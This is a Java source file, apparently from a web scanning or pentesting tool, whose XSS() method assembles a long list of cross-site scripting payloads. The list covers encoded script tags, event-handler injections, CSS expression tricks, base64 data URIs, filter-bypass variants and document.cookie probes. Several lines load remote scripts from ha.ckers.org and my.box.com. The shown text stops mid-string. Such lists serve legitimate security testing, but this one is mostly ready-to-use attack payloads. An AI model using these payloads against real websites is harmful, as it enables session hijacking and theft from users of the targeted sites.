/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package payload;

import java.util.ArrayList;

/**
 *
 * @author Shaco JX
 */
public class A3p_2 {

    public ArrayList<String> XSS() {
        ArrayList<String> list = new ArrayList<>();
        String payload = "&#x03C\n"
                + "&#x003C\n"
                + "&#x0003C\n"
                + "&#x00003C\n"
                + "&#x000003C\n"
                + "&#x3C;\n"
                + "&#x03C;\n"
                + "&#x003C;\n"
                + "&#x0003C;\n"
                + "&#x00003C;\n"
                + "&#x000003C;\n"
                + "&#X3C\n"
                + "&#X03C\n"
                + "&#X003C\n"
                + "&#X0003C\n"
                + "&#X00003C\n"
                + "&#X000003C\n"
                + "&#X3C;\n"
                + "&#X03C;\n"
                + "&#X003C;\n"
                + "&#X0003C;\n"
                + "&#X00003C;\n"
                + "&#X000003C;\n"
                + "\\x3c\n"
                + "\\x3C\n"
                + "\\u003c\n"
                + "\\u003C\n"
                + "&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;\n"
                + "&lt;IMG SRC=\\\"javascript&#058;alert('XSS')\\\"\n"
                + "&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;\n"
                + "&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;\n"
                + "&lt;&lt;SCRIPT&gt;alert(\\\"XSS\\\");//&lt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT/SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\\&#93;^`=alert(\\\"XSS\\\")&gt;\n"
                + "&lt;SCRIPT/XSS SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;IMG SRC=\\\"   javascript&#058;alert('XSS');\\\"&gt;\n"
                + "perl -e 'print \\\"&lt;SCR\\0IPT&gt;alert(\\\\\"XSS\\\\\")&lt;/SCR\\0IPT&gt;\\\";' &gt; out\n"
                + "perl -e 'print \\\"&lt;IMG SRC=java\\0script&#058;alert(\\\\\"XSS\\\\\")&gt;\\\";' &gt; out\n"
                + "&lt;IMG SRC=\\\"jav&#x0D;ascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;IMG SRC=\\\"jav&#x0A;ascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;IMG SRC=\\\"jav&#x09;ascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;\n"
                + "&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;\n"
                + "&lt;IMG SRC=javascript&#058;alert('XSS')&gt;\n"
                + "&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;\n"
                + "&lt;IMG \\\"\\\"\\\"&gt;&lt;SCRIPT&gt;alert(\\\"XSS\\\")&lt;/SCRIPT&gt;\\\"&gt;\n"
                + "&lt;IMG SRC=`javascript&#058;alert(\\\"RSnake says, 'XSS'\\\")`&gt;\n"
                + "&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;\n"
                + "&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;\n"
                + "&lt;IMG SRC=javascript&#058;alert('XSS')&gt;\n"
                + "&lt;IMG SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;\n"
                + "'';!--\\\"&lt;XSS&gt;=&{()}\n"
                + "';alert(String&#46;fromCharCode(88,83,83))//\\';alert(String&#46;fromCharCode(88,83,83))//\\\";alert(String&#46;fromCharCode(88,83,83))//\\\\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;\n"
                + "';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "'';!--\"<XSS>=&{()}\n"
                + "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=javascript:alert('XSS')>\n"
                + "<IMG SRC=javascrscriptipt:alert('XSS')>\n"
                + "<IMG SRC=JaVaScRiPt:alert('XSS')>\n"
                + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n"
                + "<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n"
                + "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n"
                + "<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\n"
                + "\\\";alert('XSS');//\n"
                + "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n"
                + "¼script¾alert(¢XSS¢)¼/script¾\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n"
                + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n"
                + "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n"
                + "<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n"
                + "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">\n"
                + "<DIV STYLE=\"width: expression(alert('XSS'));\">\n"
                + "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n"
                + "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\n"
                + "<XSS STYLE=\"xss:expression(alert('XSS'))\">\n"
                + "exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'>\n"
                + "<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>\n"
                + "a=\"get\";b=\"URL(ja\\\"\";c=\"vascr\";d=\"ipt:ale\";e=\"rt('XSS');\\\")\";eval(a+b+c+d+e);\n"
                + "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>\n"
                + "<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"></BODY></HTML>\n"
                + "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<form id=\"test\" /><button form=\"test\" formaction=\"javascript:alert(123)\">TESTHTML5FORMACTION\n"
                + "<form><button formaction=\"javascript:alert(123)\">crosssitespt\n"
                + "<frameset onload=alert(123)>\n"
                + "<!--<img src=\"--><img src=x onerror=alert(123)//\">\n"
                + "<style><img src=\"</style><img src=x onerror=alert(123)//\">\n"
                + "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">\n"
                + "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">\n"
                + "<embed src=\"javascript:alert(1)\">\n"
                + "<? foo=\"><script>alert(1)</script>\">\n"
                + "<! foo=\"><script>alert(1)</script>\">\n"
                + "</ foo=\"><script>alert(1)</script>\">\n"
                + "<script>({0:#0=alert/#0#/#0#(123)})</script>\n"
                + "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>\n"
                + "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>\n"
                + "<script src=\"#\">{alert(1)}</script>;1\n"
                + "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>\n"
                + "<svg xmlns=\"#\"><script>alert(1)</script></svg>\n"
                + "<svg onload=\"javascript:alert(123)\" xmlns=\"#\"></svg>\n"
                + "<iframe xmlns=\"#\" src=\"javascript:alert(1)\"></iframe>\n"
                + "+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\n"
                + "%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\n"
                + "+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\n"
                + "%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\n"
                + "%253cscript%253ealert(document.cookie)%253c/script%253e\n"
                + "“><s”%2b”cript>alert(document.cookie)</script>\n"
                + "“><ScRiPt>alert(document.cookie)</script>\n"
                + "“><<script>alert(document.cookie);//<</script>\n"
                + "foo<script>alert(document.cookie)</script>\n"
                + "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>\n"
                + "%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E\n"
                + "‘; alert(document.cookie); var foo=’\n"
                + "foo\\’; alert(document.cookie);//’;\n"
                + "</script><script >alert(document.cookie)</script>\n"
                + "<img src=asdf onerror=alert(document.cookie)>\n"
                + "<BODY ONLOAD=alert(’XSS’)>\n"
                + "<script>alert(1)</script>\n"
                + "\"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>\n"
                + "<video src=1 onerror=alert(1)>\n"
                + "<audio src=1 onerror=alert(1)>\n"
                + "\n"
                + "\n"
                + "\n"
                + "\n"
                + "\n"
                + "\n"
                + "\n"
                + "\n"
                + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "'`\"><\\x3Cscript>javascript:alert(1)</script>        \n"
                + "'`\"><\\x00script>javascript:alert(1)</script>\n"
                + "<img src=1 href=1 onerror=\"javascript:alert(1)\"></img>\n"
                + "<audio src=1 href=1 onerror=\"javascript:alert(1)\"></audio>\n"
                + "<video src=1 href=1 onerror=\"javascript:alert(1)\"></video>\n"
                + "<body src=1 href=1 onerror=\"javascript:alert(1)\"></body>\n"
                + "<image src=1 href=1 onerror=\"javascript:alert(1)\"></image>\n"
                + "<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>\n"
                + "<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n"
                + "<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>\n"
                + "<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>\n"
                + "<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>\n"
                + "<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>\n"
                + "<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>\n"
                + "<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>\n"
                + "<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>\n"
                + "<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>\n"
                + "<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>\n"
                + "<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>\n"
                + "<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>\n"
                + "<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"></body onMouseOver>\n"
                + "<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>\n"
                + "<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>\n"
                + "<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>\n"
                + "<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>\n"
                + "<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>\n"
                + "<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>\n"
                + "<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>\n"
                + "<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>\n"
                + "<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>\n"
                + "<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>\n"
                + "<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>\n"
                + "<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>\n"
                + "<script onLoad script onLoad=\"javascript:javascript:alert(1)\"></script onLoad>\n"
                + "<html onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"></html onMouseOver>\n"
                + "<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"></html onMouseEnter>\n"
                + "<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"></body onBeforeUnload>\n"
                + "<html onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"></html onMouseDown>\n"
                + "<marquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"></marquee onScroll>\n"
                + "<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"></xml onPropertyChange>\n"
                + "<frameset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"></frameset onBlur>\n"
                + "<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"></applet onReadyStateChange>\n"
                + "<svg onUnload svg onUnload=\"javascript:javascript:alert(1)\"></svg onUnload>\n"
                + "<html onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"></html onMouseOut>\n"
                + "<body onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"></body onMouseMove>\n"
                + "<body onResize body onResize=\"javascript:javascript:alert(1)\"></body onResize>\n"
                + "<object onError object onError=\"javascript:javascript:alert(1)\"></object onError>\n"
                + "<body onPopState body onPopState=\"javascript:javascript:alert(1)\"></body onPopState>\n"
                + "<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>\n"
                + "<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"></applet onreadystatechange>\n"
                + "<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>\n"
                + "<svg onunload svg onunload=\"javascript:javascript:alert(1)\"></svg onunload>\n"
                + "<applet onerror applet onerror=\"javascript:javascript:alert(1)\"></applet onerror>\n"
                + "<body onkeyup body onkeyup=\"javascript:javascript:alert(1)\"></body onkeyup>\n"
                + "<body onunload body onunload=\"javascript:javascript:alert(1)\"></body onunload>\n"
                + "<iframe onload iframe onload=\"javascript:javascript:alert(1)\"></iframe onload>\n"
                + "<body onload body onload=\"javascript:javascript:alert(1)\"></body onload>\n"
                + "<html onmouseover html onmouseover=\"javascript:javascript:alert(1)\"></html onmouseover>\n"
                + "<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"></object onbeforeload>\n"
                + "<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"></body onbeforeunload>\n"
                + "<body onfocus body onfocus=\"javascript:javascript:alert(1)\"></body onfocus>\n"
                + "<body onkeydown body onkeydown=\"javascript:javascript:alert(1)\"></body onkeydown>\n"
                + "<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"></iframe onbeforeload>\n"
                + "<iframe src iframe src=\"javascript:javascript:alert(1)\"></iframe src>\n"
                + "<svg onload svg onload=\"javascript:javascript:alert(1)\"></svg onload>\n"
                + "<html onmousemove html onmousemove=\"javascript:javascript:alert(1)\"></html onmousemove>\n"
                + "<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>\n"
                + "\\x3Cscript>javascript:alert(1)</script>\n"
                + "'\"`><script>/* *\\x2Fjavascript:alert(1)// */</script>\n"
                + "<script>javascript:alert(1)</script\\x0D\n"
                + "<script>javascript:alert(1)</script\\x0A\n"
                + "<script>javascript:alert(1)</script\\x0B\n"
                + "<script charset=\"\\x22>javascript:alert(1)</script>\n"
                + "<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- --\\x00> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- --\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- --\\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "`\"'><img src='#\\x27 onerror=javascript:alert(1)>\n"
                + "<a href=\"javascript\\x3Ajavascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "\"'`><p><svg><script>a='hello\\x27;javascript:alert(1)//';</script></p>\n"
                + "<a href=\"javas\\x00cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Dcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Acript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x08cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x02cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x03cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x04cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x01cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Bcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x09cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x06cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Ccript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<script>/* *\\x2A/javascript:alert(1)// */</script>\n"
                + "<script>/* *\\x00/javascript:alert(1)// */</script>\n"
                + "<style></style\\x3E<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x0D<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x09<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x0A<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "\"'`>ABC<div style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(1);/*';\">DEF \n"
                + "\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(1);/*';\">DEF \n"
                + "<script>if(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(1);}</script>\n"
                + "<script>if(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(1);}</script>\n"
                + "<script>if(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(1);}</script>\n"
                + "'`\"><\\x3Cscript>javascript:alert(1)</script>\n"
                + "'`\"><\\x00script>javascript:alert(1)</script>\n"
                + "\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>\n"
                + "\"'`><\\x00img src=xxx:x onerror=javascript:alert(1)>\n"
                + "<script src=\"data:text/plain\\x2Cjavascript:alert(1)\"></script>\n"
                + "<script src=\"data:\\xD4\\x8F,javascript:alert(1)\"></script>\n"
                + "<script src=\"data:\\xE0\\xA4\\x98,javascript:alert(1)\"></script>\n"
                + "<script src=\"data:\\xCB\\x8F,javascript:alert(1)\"></script>\n"
                + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF\n"
                + "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
